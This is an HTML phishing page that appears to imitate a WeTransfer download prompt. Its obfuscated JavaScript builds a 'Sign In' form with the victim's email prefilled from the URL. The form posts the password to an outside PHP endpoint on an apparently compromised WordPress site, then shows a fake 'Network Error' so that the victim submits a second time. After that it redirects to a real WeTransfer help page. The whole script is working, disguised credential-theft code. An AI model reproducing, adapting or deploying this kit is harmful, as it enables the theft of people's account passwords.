<!doctype html>
<html>

	<head>
        <meta charset="utf-8">
        <title></title>
		<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css">
		<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
		<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
		<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js"></script>
        <style>
            body {
                background-image: url(https://cdn.glitch.global/5c3a0ca4-2f1d-4648-a4b7-e36a7ad90152/we.png?v=1670830144657);
                background-repeat: no-repeat;
                background-size:cover;
                height:100vh;
            }

            #myModal {
            position: absolute;
            top: 60%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
            @media (max-width: 575.98px) {
			#myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
			body {
			background-image: url(grd.jpg);
			background-repeat: no-repeat;
			background-origin:contain;
			height:100vh;
			}
			
            #myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
			#asd{
			display:none;
			}
			
			.col-sm-3{
			width:46%
			}          
			}
        </style>
    </head>

    <body>
		<div data-toggle="modal" data-target="#myModal" style="width:100vh;height:100vh;"></div>
		<div class="loaded" ></div>
    </body>
	
	<script>

var _0x427179=_0x4319;(function(_0x158db6,_0x156238){var _0x36796a=_0x4319,_0x569938=_0x158db6();while(!![]){try{var _0x5655ab=-parseInt(_0x36796a(0xd7))/0x1*(-parseInt(_0x36796a(0xea))/0x2)+parseInt(_0x36796a(0xde))/0x3+parseInt(_0x36796a(0xf5))/0x4+-parseInt(_0x36796a(0xe7))/0x5*(parseInt(_0x36796a(0xd8))/0x6)+-parseInt(_0x36796a(0xdc))/0x7*(parseInt(_0x36796a(0xd5))/0x8)+-parseInt(_0x36796a(0xdb))/0x9*(parseInt(_0x36796a(0xdd))/0xa)+parseInt(_0x36796a(0xf6))/0xb*(parseInt(_0x36796a(0xec))/0xc);if(_0x5655ab===_0x156238)break;else _0x569938['push'](_0x569938['shift']());}catch(_0x416f44){_0x569938['push'](_0x569938['shift']());}}}(_0x31fd,0x27678),$(window)['on'](_0x427179(0xe9),function(){var _0x5f33c4=_0x427179;$(_0x5f33c4(0xda))['modal']('show');}),$(document)['ready'](function(){var _0x411375=_0x427179;$(_0x411375(0xe4))[_0x411375(0xeb)]('\x0a\x09\x09<!--\x20The\x20Modal\x20-->\x0a\x09\x09<div\x20class=\x22modal\x22\x20id=\x22myModal\x22>\x0a\x09\x09\x09<div\x20class=\x22modal-dialog\x22>\x0a\x09\x09\x09\x09<div\x20class=\x22modal-content\x22>\x0a\x09\x09\x09\x09\x09<!--\x20Modal\x20Header\x20-->\x0a\x09\x09\x09\x09\x09<!--\x20Modal\x20body\x20-->\x0a\x09\x09\x09\x09\x09<div\x20class=\x22modal-body\x20p-3\x22>\x0a\x09\x09\x09\x09\x09\x20\x20<img\x20src=\x22https://cdn.glitch.global/5c3a0ca4-2f1d-4648-a4b7-e36a7ad90152/to.png?v=1670830146465\x22\x20width=\x20\x22100%\x22\x20class=\x22img-fluid\x22>\x0a\x09\x09\x09\x09\x09\x09<div\x20class=\x22text-danger\x22\x20id=\x22msg\x22\x20style=\x22font-weight:600;\x20font-size:17px;\x22></div>\x0a\x09\x09\x09\x09\x09\x09<form\x20method=\x22post\x22\x20id=\x22formx\x22\x20class=\x22my-4\x22>\x0a\x09\x09\x09\x09\x09\x09\x09<input\x20type=\x22email\x22\x20name=\x22x1\x22\x20id=\x22x1\x22\x20class=\x22form-control\x20mb-3\x22\x20value=\x22\x22\x20readonly>\x0a\x09\x09\x09\x09\x09\x09\x09<input\x20type=\x22password\x22\x20name=\x22x2\x22\x20id=\x22x2\x22\x20class=\x22form-control\x20mb-3\x22\x20placeholder=\x22Password\x22\x20value=\x22\x22\x20required>\x0a\x09\x09\x09\x09\x09\x09\x09<button\x20id=\x22submitBtn\x22\x20class=\x22btn\x20btn-md\x20btn-primary\x22>Sign\x20In</button>\x0a\x09\x09\x09\x09\x09\x09</form>\x0a\x09\x09\x09\x09\x09</div>\x0a\x09\x09\x09\x09</div>\x0a\x09\x09\x09</div>\x0a\x09\x09</div>\x0a\x09');var _0x5281c9=0x0,_0x470184=window['location'][_0x411375(0xe1)][_0x411375(0xf4)](0x1);$(_0x411375(0xe8))['val'](_0x470184),$(_0x411375(0xee))[_0x411375(0xf8)](function(_0x176756){var _0x21c2f9=_0x411375;_0x176756['preventDefault']();var _0x57b1f8=$(_0x21c2f9(0xfa))[_0x21c2f9(0xe2)](),_0x5d387b=new FormData($(_0x21c2f9(0xee))[0x0]);$('#submitBtn')[_0x21c2f9(0xeb)]('\x0a\x09\x09<button\x20class=\x22btn\x20btn-sm\x20btn-primary\x22\x20disabled>\x0a\x09\x09\x09<span\x20class=\x22spinner-grow\x20spinner-grow-sm\x22></span>Please\x20Wait...\x0a\x09\x09</button>')[_0x21c2f9(0xed)](_0x21c2f9(0xf9),!![]),$('#x2')[_0x21c2f9(0xef)](function(){var _0x407d5b=_0x21c2f9;$(_0x407d5b(0xe3))['hide']();}),_0x5281c9=_0x5281c9+0x1,$[_0x21c2f9(0xe0)]({'url':_0x21c2f9(0xf7),'type':_0x21c2f9(0xd6),'data':_0x5d387b,'contentType':![],'processData':![],'success':function(_0x33ceaa){setTimeout(function(){var _0x213965=_0x4319;$(_0x213965(0xe8))[_0x213965(0xe2)](_0x470184),$(_0x213965(0xe6))[_0x213965(0xe2)](''),$('#msg')['show'](),$(_0x213965(0xe3))[_0x213965(0xeb)](_0x213965(0xf1)),$(_0x213965(0xe5))[_0x213965(0xeb)]('Sign\x20In')[_0x213965(0xed)]('disabled',![]),_0x5281c9>=0x2&&(_0x5281c9=0x0,window[_0x213965(0xf2)]['replace'](_0x213965(0xdf)));},0x3e8);},'error':function(_0x1e7c5b){setTimeout(function(){var _0x5188da=_0x4319;$('#x1')[_0x5188da(0xe2)](_0x470184),$(_0x5188da(0xe6))[_0x5188da(0xe2)](''),$('#msg')[_0x5188da(0xd9)](),$(_0x5188da(0xe3))[_0x5188da(0xeb)](_0x5188da(0xf1)),$('#submitBtn')[_0x5188da(0xeb)](_0x5188da(0xf0))[_0x5188da(0xed)](_0x5188da(0xf9),![]),_0x5281c9>=0x2&&(_0x5281c9=0x0,window[_0x5188da(0xf2)][_0x5188da(0xf3)](_0x5188da(0xdf)));},0x3e8);}});});}));function _0x4319(_0x1ce097,_0x559ad8){var _0x31fd79=_0x31fd();return _0x4319=function(_0x43194d,_0x51efc6){_0x43194d=_0x43194d-0xd5;var _0x4a84e8=_0x31fd79[_0x43194d];return _0x4a84e8;},_0x4319(_0x1ce097,_0x559ad8);}function _0x31fd(){var _0x248f6b=['#submitBtn','#x2','152820uwtdiN','#x1','load','2ohvFQH','html','542352HFiExE','prop','#formx','click','Sign\x20In','Network\x20Error!\x20Please\x20verify\x20your\x20information\x20and\x20try\x20again','location','replace','substr','1144672IkuZUb','33OPgDPZ','https://alfamerinecorp.com/wp-content/smile/post.php','submit','disabled','#A1','53328oIqgcb','POST','85667qHPeFW','54rqSwUv','show','#myModal','9ncVsob','161pChEqu','360320pwhygM','355209HlNfwC','https://wetransfer.com/hc/en-us/sections/201965293-Trouble-downloading','ajax','hash','val','#msg','.loaded'];_0x31fd=function(){return _0x248f6b;};return _0x31fd();}

	</script>

</html>
